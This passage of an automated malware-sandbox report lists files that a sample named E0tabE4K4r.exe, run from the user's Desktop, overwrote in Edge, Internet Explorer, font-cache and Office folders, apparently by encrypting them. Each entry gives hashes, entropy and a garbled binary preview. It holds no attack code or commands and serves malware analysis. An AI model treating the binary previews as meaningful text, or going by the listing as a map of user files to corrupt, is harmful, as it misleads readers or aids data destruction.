                                                                                                                                                  SHA-256:D6BA6EE1A4F39C1095AE734B8971818855A11CCCCF1C00AD248468DEDDCB248D
                                                                                                                                                  SHA-512:E2506A74A439756EF8B6A64A6BEEBF0E138415F25E9B652655138225A9B43ACD984C8C8CD2891B70AF73D918802DF39E4FFAD0159F655B1EC8CB45F3B7E60CA8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:[{"deo..a.!..k...19.O......^.G,].......\0.:.V.v4...}.[f.5.O......F....7..8..W..9..........j....y.-......a|....$Br.e.[.....6..S...hv.@3R..w#...........&.P..N....n ...O..N..A./z.....~....b*\.Z.....U.....E.fQ.Y2..x".I....-..U..YW|........;..S...f.|.........<....Ic..-..l....."..kn....X5.....S7...A...9..H....u.P!...Bh...lQ.QY8)H...N..O......b.8w.....D..=....uEW....E.X3...t.G .D..`..t.....c.OMm.L}.S5C..I.z...X.....:..|..h..=...:A Z".<...,...X.L.X[.......?..^..K.&k...:..W..E.$.-S..Q..jGr..T.I...S..Yp|./........@.J.7.........tH.{...8..t.S.'...6.......s........S..ga.&...c.l.k3CU..["....&4.C..=6..tdE$... ..g..x.(..>.C..Y....X...1.M.y.?{$h8.."..n...4..H....,f.Yp....~......9..@......dv.}+..=.b...u.jF..S.`..n.r5Dg ..y0..iB.J.W..~=..g.x.B.]"..N.7....U.W.8.....q.f!..{....<....I..%'..rE.7...5..e.q.!..W..8...y..{{.z.+...E..'.....}O.....\7HZ[R...l..bC:.o....|.].5,..\..........~N....D...r8.....%>.....R...)..!.....9.P.L......

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\_metadata\verified_contents.json

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):6034
                                                                                                                                                  Entropy (8bit):7.961848326900834
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:DrV2p+j4MGhV+p/f+umtFcFpc/h7bH6EA6izzntDjFiwSfnjwmPV38oiBz3:DR2w7Gqp/fTmtFSc9H6L/zzntfKfnjwX
                                                                                                                                                  MD5:30E6F3176B3A5A92D7FE18E99BEDDF59
                                                                                                                                                  SHA1:06DFB9E2207C2F13A8E00C11F3F3F4C0A1519BB3
                                                                                                                                                  SHA-256:C6885A09F88998C27F47F1118066B3F8642B7AC091CC2351E46E09F0D2AD4988
                                                                                                                                                  SHA-512:6A59A3984CF4CAD75547C6A743BB4B9D96DF36E63C3344E23DBDC158C414E0D271BD1E6E15883D278F2C90FDC233900B6614C953839453D3A6B6B47BED9C4305
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:[{"deMW.P._h..-h6.F.LB..]...j..a.9.U...w@_T...g..v..n)..Q~.-[..n.y6....|4_....D...;..w...a...ud.V.o'..,.X.P.6..I...]x..O....@.4....p.L*.-q....w..gp..3..V.%"|a...W.c.\>..5.7.`]JQ..#.yWS.,..L.......D.0..F.H.....K$.5.-;Xi.G...L..g...e.......>..e...^.P4..b h..s.dq|UI..._..FiY.F...l.A.Iz.V\..46!.t.Ma..I.<....5....:3I0..E.U#n....G..8.g.39....^x..n..pl|.P!.6.;_T..sw......1..m.{s...w.!.......U.X\._.j..!&.l9.c..5.PK.....Z."j.]....ic.!.;.iI.T.......X..@Y..>.\M\..x,.......4.0+]...o;...es.E..o.(...D...c^A......hG&.....f.E..1.<.....(..& ..M...).b....DH.Y..9.BmU.....nO..........m.P.k. k.X;..q.Tn."#.....|S(....60.. ..>].........0.x.Da.=..M.Z..>GXS.5..9.m...H.s..|...e...8.z..].WTgop.S.$.0.8!........hA.....s.......T S....n....Z..."x..h,dI...#..v....>%..*1...*.;.DcVC..W.V.`S..$..E...%...4......fm..s*&8.#...wp.rj.YhL...gf]t.`@.e...I...1.mN..NP.v.t..o...S....7.\.UG8u..`s.a..[.......):F.h..U."...).C5..$..............#..D...K....Z....9.N@..>&p..J.Aa..y.U.....

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\FontCache\4\CatalogCacheMetaData.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2203
                                                                                                                                                  Entropy (8bit):7.9077049443310585
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:tEPLIAwKbl7H3Ls8Kgl36igpS/46RDm53SRXSejDhMNaDuD:tETIAwg7A8Kq36ToBQ3YNDS
                                                                                                                                                  MD5:7780FBC9FE9671579453E45DFB504022
                                                                                                                                                  SHA1:06C2E73DD7492D82A2F87237162FED237B071D14
                                                                                                                                                  SHA-256:CDE26220D79817D5BA947D6D9F91EEADDC0911CBF1F5629CEAADA056AAD931E2
                                                                                                                                                  SHA-512:0A516BD593018502CB5162110D44AA4D78F761350487667B5A88BB82D2EA3FB06B36D3B0FF92356AEEE4B67D8AADCD7E92D85822D24B4723EA83E160FBA024B2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.B.......(...P,....H.l.......u.p..........:...H.C.G.rAUS...e.A..k..NF...vQ...v.e4.........;._d.0....X.?..i.O...u.I..9L.[..y.....z.....+.h..V.....-....F..LT.Mb..n.R.p.....^.1*.....q.N82......._6.RL..s\...x.D.....-.....U......../....j.Va... Z6G....L?..9.S.51`.*.F.|t^....U+.g...n.c.w.u:.}=....F.Oe.......D..M.....`...I.D..=.2....]m.l.Z0a..1..QE&|9..39...9r@..%|....h....K.....g..tr.I..,..[.....$.B....=..b..Q5...mY....fm..+........).K..J,..a......M.|-.Y,.5..Y..e..#.....-..]@.?...2.-.I..2.m......SL`.D(.W..#.2..x.....{.~.*..%....u.4..c...<.hT..?.F!;Rv.~.....M.....S...$P..~.y...T.......k......r....m....j.;t...v..M.:...8A..]..wFn..'Y........nY....?Lf....Fw..O..Sn.L.L.k/.L}.G....U%0.|0p..zB..j.Yj......h..}...6N.HHa...p.).=...\r=..f..a.../6..[m)0..Z..:.~!.......! ...d.,.B....>o,5.D.../rm.}qd...D.o9...|.a o.I2....._......C.y2J ...Y...3..9~..m.+..... .y*.*.n..i*.......dUF...r`..N.N..-...\....&..F.q>.m..Z/.]...f9.~I...1...X7O./-....J.*....

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\CacheStorage\edb.chk

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):8526
                                                                                                                                                  Entropy (8bit):7.9777193590283915
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:dLyo/wPeKYF6hnQOhKv+FsK+LiodCtKnLEjAgb23DhZHk:d3tshQOhYRJnwjN6pk
                                                                                                                                                  MD5:068B36AEE40655C1A59159F157EDFB88
                                                                                                                                                  SHA1:7557C43FC3189A05058DF03C3CE75912B5682E3A
                                                                                                                                                  SHA-256:A81A1B333BFEC594F88F141257A14ED16559E91304822C8B511B1642BEF2D49E
                                                                                                                                                  SHA-512:58BAC044980B406CBFF68C7688AD683F4FB99035478862169F7A462BC439EBA7F7ACBF833F9DA6A33AE52414B638E5316FEDA406C3E258FA60756E167788B4AB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:".....?@..!...>...wv].G.:..`y..D..[.....cC(..<[l$S...T............F.4...|.......U.Cn.}... R*.J19.).,0`........e....**.U\..U.zn.VIZ....Bi.(.k..p.{...6@.Ra...8V>.....V...........8...x.I%..c....=C[.N.....R..y....Na.l..."....2..#b..2m...$ Z.D..N.....9...$...............8..C.]uv..-....4..:.G.^k.H.TI6.....2.j........W.,.".K]....K.0..T...9...-...6A..A..5..B_....L.b6....B...a..f.H^E..9@...........d.w...!.........Ll.?.q..&Hb..5..I..'!............s#.{.....W..3...Y.;..{JAz.7e$..Y.Z.G.V..RK.4 ....Q........#.5^]..{.....(.JE.S/T...tW`r..!....G!..#<C%j4..2..Bv..X....p..<.{.Xla.c....Ce...2/..:.H'....Z...+.Z..a.zY.%...e./.......j.~.D...R>...+..a.e.+..#'e;F...5._...R6..Qq..x._...*/...c..!.H.v.E.|.....L}..9.....; 1g.r.{..B..d...@(]X%..X8.....V....t.fJ8...~W]0Nmk.sa...fOy......"%+.,..]l...so....f........K.Z]...uZ....i..#.o.A....mp%^..C.<...<..|0.X..."0y..;..>s9. LIV......$.K..V.m...-...b..o..&...+...x...otP.S.....r......=v...7.....U..O..o.....>..n,

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\CacheStorage\edb.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):524622
                                                                                                                                                  Entropy (8bit):3.953402704738034
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:UcQmiBtJ9RZ4zT/onJAWlSXeNJ/zpZVS/Cn:o7HZgT/oJTlseD/NLx
                                                                                                                                                  MD5:5B1079075E8A123DCB2C568A0D3CC0FF
                                                                                                                                                  SHA1:A1D82C3F5FB2C0E8FBBC337B3592215A0AE4E3F1
                                                                                                                                                  SHA-256:30A5EC197FD9AB0CF1C37B3C4DC393C679E6D29F4FFAFCCD3F28E711BA56E44C
                                                                                                                                                  SHA-512:7C0AE7FAFF97E0CBD007C14DAF0FE2B67D2FE105CF9BA64E971AF25A615482179F7C1BA5B7D8D43396194B31395230B8CBF40997344C9DD52A87D8B7C89BD72C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:...~.]#..].?..v.6...a....k.%I.....B.S?.b.K..[....lih'ph.@.l2...g.WD8.4&^.*...L........`....k..w...,.......y~....d..&j/.R..QUCn.RA..B../....x:.aqd..0..A..B.a...,..~..tO.......S....p...g)eX..~..Ws&..S>.%.n.....Xt/..r......5.}#..8A._V.Q~}..4m{/6..9"fB.9...........Y......`,8?l....b;$..:.b......FT......'B.W./..M....n.N..N........T.9.z.B9B9....w.ge...Uge.a9..6^.@..8.6...M1..>.y..@.....8.t.A..N.."...<D,.........E..>..58."BP%r..........&......x.7eT..l..|..'."G{......K........K../.x...m"%....xbE..OH..Gq;.8...'@.>.\$lj2.#Ok..c...g.+l...kV..t,ID.\..+...........de../.8...`..f{....%.W~G..3p.H-...G.$+c...........$..%[....&?....#.F..*t}....n.......z~$I..)?..9F@?..;f...!...ji...(.U.,.`..O.h......L.s.8..a .PVi..q ;&...$.t.T......}k.S...L.2i....rh{..X...E...{..h.F..>..yW`<..O ..u.^..e.q..7.O*....y...;.r. .._f/.kn..J.9...nC.$.&hW...MN..&....(f.z..y..'A.E...6.9.*N0..4...Qh..l.!.\....M!.. Q......k...K.......v.=..bkZ..kl..l.a.Q:e........,,fO...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\CacheStorage\edbres00001.jrs

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):524622
                                                                                                                                                  Entropy (8bit):3.20745994679025
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:Kdn++D40llgABg31GHCYg6JK/I+N7CXglGD18aNlZRo58:KJ4IgYrJYbegI5hi58
                                                                                                                                                  MD5:8D95807C93E12CDDCCEFE004A282EB35
                                                                                                                                                  SHA1:354E548BB12F893A506D9C3370A9E5047CD0B338
                                                                                                                                                  SHA-256:DBED32A8640D86DCBFABFDD85C7037BFFD69564B6354FB46B7688F62EF2FAF31
                                                                                                                                                  SHA-512:A4F43C28E6C085AE7F98DC59AFE18E63A4C0E5609C3905EF4CC4C555686F625DDD31860731D1251C4958358AC5A96E278F25A753FD4AEC1B9E2E1CB83610BD72
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.......b.-../.U...@..7..+.8<j....F`|..iUM...1.f..Y..oM.%j,...".r.......d'v..#.4...Q.xD.o...^*S.....y.....X..<.."9.. .....,....O...X#.{........$......`.}L&..3;he.o...zZ.........%.=7.{...T(.s.%..Z.\"9~M......c:~.........Q.....tJ....e.........]O0..+..T.f..>.k......0XN.@3GU..!.c.8YK.G.....y..S....C.$eM....4.q$.l+.....n.u.&.I...Fi^.......5y..e.D...w..8.J.......X..4.J.hn}.3.;.K....h..`.avX.dF...]....JK.z....eH.....V..a......<:lJ..p.\.j.....g......2....;}...[&...3....k>5.....Cs...3;...ha......98....0.....P..F..hLx..6zd.>].../Cz...@xQ-...|../B{.v,..5.@.+..r-........&JR.. ~..GZ....B....E.=jTP.....]Y7.r.*s..~.z.z..s..af...(d}.+~...}X...rG..?..HhF..[9J".t.'x@.....vL..Z.....h,......:5.x....F`JD.F.E...G]....V.>$X.J .Dd._D.-0.)W.]...EA.. g.i...}D.....fs....9ru8...N.5..4Y.8.NP.n.'..xk8.YfD..v...........gP.G.4......W"..G...2&..B.....L..,...d....E0R].C)mG.....Q.s.?..wh@S....$]m......\...*.zK.cb.....KM..t.$=...q,&y...U...Z...P..;E..$*....a.O........?....x%h

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\CacheStorage\edbres00002.jrs

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):524622
                                                                                                                                                  Entropy (8bit):3.2080072248817677
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:+dvfyT78eqxoEwRFNzqVo+HlDZqTtQvmm2R9dHZJWvrwo63qqJtrx:+dvEVzqrlETivER5UDwxlJt1
                                                                                                                                                  MD5:4D96FF0CEAB7155021A897CE4AE569B7
                                                                                                                                                  SHA1:B8C62B356A9D1C90A342C0DCF74AF127CE8FAD6D
                                                                                                                                                  SHA-256:6FDFDF7ED00517DE22ED60B679A4F6529197EDCC0B59EC8C5535988D6812FF13
                                                                                                                                                  SHA-512:C227B5365E383DDBF5A7F8B90B03A6E3800BC58DC8DE6BE9155688A7488F7A9FC81D581A971FFD6DA79F69CD6C8D18C85ACBB89B4529FCA339CCE692E192E0A1
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:......n.=..3.Re...Q)<e".=j_........~.^]....g&(..XD....oRC..o..Y.'.....k....~.J....P..Y,...Vh.n.. Sg.Q8.0............E.....K*B.~){.5/}...%F........7.:.....3....P...........~...$#...di.....m ..e.g..ea.'. ....G'_j".h?7.1.`..a[...G..M.*.i.Ne.a.S.#..Tk<.......U.0 .?..!..P..7....aM..v..g.@..:[.....}.n......?P..W...T..(.......&...g....}.2D/wN...KqK...."s.mP~.P......&...~..pce...)...Ep(..7A.C..h...m.UM,...._.@....K@.;.t!...=.tf.q.16R..E.^&H]...a..]j!R....u..)cV......t..X......5.'.J...J..@.}.k.%f....[5.#Q~L\[1$..M&..N/4...7.V..$E8...7..5.Xw. .1..}7.+....,.0L..L...3@.?..+..=08.|..=...H.....<`.\..`A..Y..6..|...2.fC..,:........_3...o.[..s.A......J6 :.>...^H>...O.4&....iV..R..iFd, .x(H..X......X;mB...XxR./....`..5.3.f0.qE.i...Uf.\9ZG:5..L....K..9..{.._....*2..-..j.Bi..Q.zBU..0x...3...mc.L.1.A9j..F.^....A.RMu.TI...n.........t"':/..s].-"<\B..">./..2.,..u>..2..f.L.YQ...g...;.._..1hL.........x9../.G..."u}.5.U..`]n.Mh...$W....V...L.|.MeW....Z..G..U.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\CacheStorage\edbtmp.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):524622
                                                                                                                                                  Entropy (8bit):3.2087727542363553
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:5c6Ml7tmGFuYEGTYHf+ddK7AHXOhrC0TzImNP:5c3l7Yk86dLXylzImNP
                                                                                                                                                  MD5:AF3FC4132B6410E3BECD82674470FA39
                                                                                                                                                  SHA1:B52326FE7DB390DC3CA49CEB109EBD656C57E695
                                                                                                                                                  SHA-256:CC9AA4449E72E077D080237B95565C4D2A8C75A968F1F4A87123F3D1B3CE0819
                                                                                                                                                  SHA-512:B92D37ED18B00B852F1BA661BCAE53C00EFB3D559FC9E79362B5F168CB09C28C118C480DEF6527F82AAAED8FC1BC1331D2C8D5A25EEB2500D929CEF986E1FE94
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.....x./.hI.9..xIN=.sL.Q./k.......Q.+.n@Yp.,..b*...Z..&k}...A....[v..2..b~..|..@.H|.%...f.e'v....S7"..?z..k.5n....r..Y....+....v..........Ol...m....-M.p3t".....z.....U.j.. ../..d_vv..X'#^.....'.W..`....Zz..7.....Z..ju....].iL......g # ...Y...Upk......?..{..#5..d..Z.yX...........m.k.mO....X $...,.P0x=.q#..W.A....JD).(..s-.....v...`.3........JS.".{O..h&...J.....].O.Rp.u\..Hx.0gv.M...s...{n.qN}. ...(_n...).%&T.x..v./,.*.U4r....Q.....=.p....A..qt,..P.b..Q.}Y..>.B..2B..$..EY.@.h.V .8.qL.T...PO.....e-....[..9.f.s..z.x.n..c.k....8-^.^U..>0......S.._&yQ.d.. ...^....}H.x...3............V>_.......K..@Dv.......,`.[...W....<..H.k....N..UTe...G..Co}W.D..V0.1Y.>.5...y8...Z4..cA .:..AT..S....e..]..S..].8.bK.l....H.x..O.\......y.qs..C+.Z..9.P#9.._J.).....'=..l.N\7.....O|.&P.:. ...7#3./.....\.^.n.5...y......7Y...(.^..3..7F..@9>.^)f._!........*.!..;q....|.p``C....A..Q..hN..a..V...[.P.&.....MA...N...?a`..X=_..K.N.<!g.I..a.72..n....~..xw....Y..i

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3384
                                                                                                                                                  Entropy (8bit):7.9390200608069454
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:XSHZtbST7hwgwNu0TuEDWnRo5+05xEQZgGBWX0wdV9LnYDN6+kmUteK5KhIH8JD:sbSTIRD2CxVFqN7ebQoK5Kh9h
                                                                                                                                                  MD5:FA060D5FFFC258D74933B1F14E686E6C
                                                                                                                                                  SHA1:5262EA9C59DB0B9B27B864B6882FF3E6CD10ED32
                                                                                                                                                  SHA-256:554E111241C868CA7B11FD0E27E70DFC1542102E87DA14A36583BA31B756158A
                                                                                                                                                  SHA-512:596F6537EEBE093F2CC63BB8BC12C83244603ECCCCA1122C300E14E1D0A3E3287EB70867E58E5364F8B0A080A95C6CEA6A937D1F99C0EB0C17DA99D254BA94A7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml4.(RcCcl...=u!IJH.N+.t./.nd.h.i..V[T&...!.E.......w...@.U.N..([E.. P...z..?0.Lk<.%[w......|......$.wbO.....<.,...=4....N....t9.~1....0D.:#XS2.....>....B<.O.D..'l..g"c.,.o......<..O...............%..4....tC.j..Z.wT7y..1A?.<...L..]+..$N8...2m.`v......6..5.V>D..(.......n.r..dX..t.*..q.=%.\.....V...... cDa...^..[.;..f..mD..v..5E.Y.k.g.....V4.:....h..Vm...Du2Q..x..S.M*.:.o.....DQ.HD.3../,.K.*....;I..@.&."..[.+._._i].Dk...JpFg.8....v.....!4...Om.usK...+f.a.../..0...{]e].O/.x...%....N...k.r.NM+.2..zN7..u>.E.w..[:.H!E.K.E.+...B.....Vre..}j..FF..#6..[|..heT.).....Vp.....}..n......<H]O..c...t.0..7`N............/6R....-,....K.....3J.%....B` ........r.~......vq...Y.#..Z..!Dt..1.}.>.-(.$...tlEFQ:^...R.x...R.!.a.O..!.".iJ._(....+_..ak..-c...Y...p.+.5./.p!...ac..|.....t...u.....k.dC$a.z..`..0...d.3..y..x. ..O5..*.b....?..j....,ja...=u.B.K.J..+`.....$.2.....L.y......G....J.m....>e.z..:..ow.X 6W....u.!.$\...+.!v.Q.+...m...A...YI..[..D0.%.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):6906
                                                                                                                                                  Entropy (8bit):7.974432508389135
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:dE+D91BWnUu38DqembPdM79rhMkNouzt+H5:+u9C3FeYMJdMkO2+Z
                                                                                                                                                  MD5:7AEFB422579BD9737BE29F0FBBFC9435
                                                                                                                                                  SHA1:77D392BF40FA8F0B65AC8790041D894D6AAECE65
                                                                                                                                                  SHA-256:5E6F08B84311D6BA7C91A0D05EABBBF4801B63E2C72BBFEA61B4BCEDC72200FF
                                                                                                                                                  SHA-512:19903EEE5BF2D0F9564A2C201812AF7F55BC070DB5735EC52EA34DC9888564176D7E776B2151043D29D13E94D656ACAB4C622740041C2F794AB33610ADEEDDF4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:10/05.3p..@.h.y1.A....t.D.5..(M.......F.^M...|C.I21..L.5.X.n....fO\.G..{hBx4>Q.....Q.G.SS...4Y.p..~..%..nn~..l..R.e2?...^N...ef....].8.OZ.l.u.).Q.6k..1u$zt....-*...#........uqvAk.'.0..u...L.MX\X.m..r@.`.tQ.5~$.....+.u`;..:....Sg.7ko.nUG.c.@V.l......>..'.....s..,.......3.D....N..0.S.....5D.S.tf..H.G.x.C..%... .g.m.t].t]......P...|...(.RH{..oEk....z.RN.q.....Ox.Q..G......tpW?@gw.=..........|h........4S(Z2..k%.Ev.p..,E&..9.$..[...^.+.a...{.w..n..P3H. BmF..k.I.A8...8....%\.t{.)|..~.....s2..P..........6.................N.....P..._Yri.j@.K0i..QE..(.....X-(....H57........p.}...d.7S,(dJb...i.....!6.e..{n.=....mC?.M.G..m".:...3.C.Z\....r............w.n.OD...Tw(.x...@.....d..c....J.9..L...>$L...1...."#.......b,lH.....R...v#.&O.I..I......|..9e..@...Hh%^..^..Vw.Ld".xo>..`D$....*$.!.L.V"x:.J....7FC.......e.....O.,X+0..n.P2_...Q.Q....b.P..(.=.....x2.^.E.928X...\...<./...S......y.t..\._..%.s..].^.r.Mx.M.Kv..!..w..7R..^..=V...]c..U.....t4_.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\ie4uinit-ClearIconCache.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (416), with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):834
                                                                                                                                                  Entropy (8bit):7.734278883985571
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:QrfL2x1c2WZNjY8T0etaDyiZPBXcwH1SAxaKUV4iRiUQZHjOKx/jaHj+hsZNg5l2:QzLU1c5lNF61raPeEQ1jOmyj+FeE2bD
                                                                                                                                                  MD5:7D0BE53517F83E24C5A7691C65FE11C2
                                                                                                                                                  SHA1:212A9CD2D44C7D5BB225F9D5728C38FF6EB683D4
                                                                                                                                                  SHA-256:3BC95D10C64A368AE934BF0E5A45CF863073C3FA3E0375A2F2428586EC376F8F
                                                                                                                                                  SHA-512:88BCE9A7FB4425EF6C925DC8F8D15F5AEFBE6FE100CE9BD09F953ED757ECCA168A8C507AE2D2CB62DE962CCDCC7254860737C32D807E791D37E443C60354D4DC
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:..1.0...A.....w.1...5.._.,...[..Y.^ .-.....Q.._..S.$....h.Lp....d.M....H.1^|....L.+6._5..s\....1!E1.8X.&:.i]W....".w....(;y..|...2..il%.............P.~7.JWR.G......+m". ..D..L.b.#..>S.^.J..h.!.....6...4...e.WG`K.......]I.K...T.....HS...Jkt.h.(...l..r....Oc).S....f..-wF...,.~!)....3Ms4.4S...3n..p#5.W....:..g.i...S..f,...dS...z..,.w.se.4...n....f_...i......0.d.U..O..+.... .g.&...C*85 .!;>.j..>..GZg....O.TR...k..R>zm,.....(;.L.+.n=......h.....Tz]n....@.......r_z......../..f.."..P..b.'...zU6..C..;.%g.Ic..F6......O......qy_....M..6..Q...u..X......e3..KP~....&5)./v....z.=....... ...$...\....y.9.W+$g.x.=S......>.Z.a.S.,..PNVi%.h..e.....g(p._"..?).W`.n.3.. .*..lwo04i..X.9....~A.3T/.m.U..E.... .N~[t....FG$....74....o.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\ie4uinit-UserConfig.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (870), with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1742
                                                                                                                                                  Entropy (8bit):7.890468427856481
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:6LornCUELudYTYmuN1dUZXDaMDQgXlVB24izQ4DD:6ErnenTYmk10za0QgP4P
                                                                                                                                                  MD5:4B1AEC21BC89F7E41FA9C40A802CC518
                                                                                                                                                  SHA1:A1D5D2C5EB72A9E68521A493A8FC0B0193C48393
                                                                                                                                                  SHA-256:AFBA3941B76EBAD783EBD87D0A585B294DE9A787BB3618A41943F2B6956516BA
                                                                                                                                                  SHA-512:2D34979B8D1B9B22AA63FF38D11D67CFFDACE34A28EDE497BE16833BB1F0C6E5B759D35F66038ABDA4A744E76236BFE8264143AA9DB30BC2F2F4DD548468EC8A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:..1.0....W..q.........`.q.}..9.}...5..377T........NW...,.~..R.+.).].}b..1{....8.C.?..Z.sI.N..R/q.cQ......(....6G.cF.N...}..|.^.o./)c[....mz.%*..L.*...K.~....J....s.j.d..+[..'.O.hAH.h."..ri>n|..a.,.jW.X...]`.......+-b....]u.K..?..E......x.J.1..W...{.#.....6......!BNd.]..,T......;b.Jy..n.B..s..}H8h0._...........e..Y...:....0I..h(-..Rny.^....J lc".PDv.q.dA..R..d.{".........;P.......|y>..8.}..u...@.A.......m..Q.....W+.8X....K..........]D...os.......P....SJr....;...W...k...d..i.:.Y.*b.blW.R.....SM.W.%........`$.2....3g.l../9...%..Qj...Fx-..P...M>..Gr.#..6-.`.;.17.Mx..S.Z.&..9pL.9.....{WJ...e...2...L..{...|........j.....u....=.&.2.....<^.R.#...-....+.R..k....q.+.-...q.p...d&....!.._.Kn.A..*.M.........{..5Z..~..#.v.~.......}.jTQ.......... .t.'V.}.e...t..(.2H.,q.^.7.2..u...V] ..I....L.N..F.......kJx.t..(..O..L..R.Y4.}..e...'.....S...hK...xC^..\....$......(KT........../[.d..]onL.;. G7..6.XF.%.P..s....s=<n...3I...6.'.4.yfd.....v.xooAb.i..8.u.b6..-

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\Personalization\Content\Anonymous\Insights.json

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):724
                                                                                                                                                  Entropy (8bit):7.712749149542005
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:KybPDgeXV9NhYbzayH1rvyNh8iK8z+Q5gse2u9iZqZxCUT5j398uJGFSUdNcii9a:KC/jwzayHtvuKE5g5Hz198uso2bD
                                                                                                                                                  MD5:71FA6D452A9BDAFBF58BDF8EB2D0182B
                                                                                                                                                  SHA1:654A5791903C669B0B41F73CE02A7087321D70D4
                                                                                                                                                  SHA-256:368386E6F8A4A83117F62AFF36220817555E1055757AD261AD012C015F20B687
                                                                                                                                                  SHA-512:666322D6D6FDB3DD86B7C1CAE9411D8B601469B8BD1911DF8F827240A9194CA388FC922765F4CE37201E9276F2E4ADA630846C09B1825F055288C1FB9AE8501C
                                                                                                                                                  Malicious:false
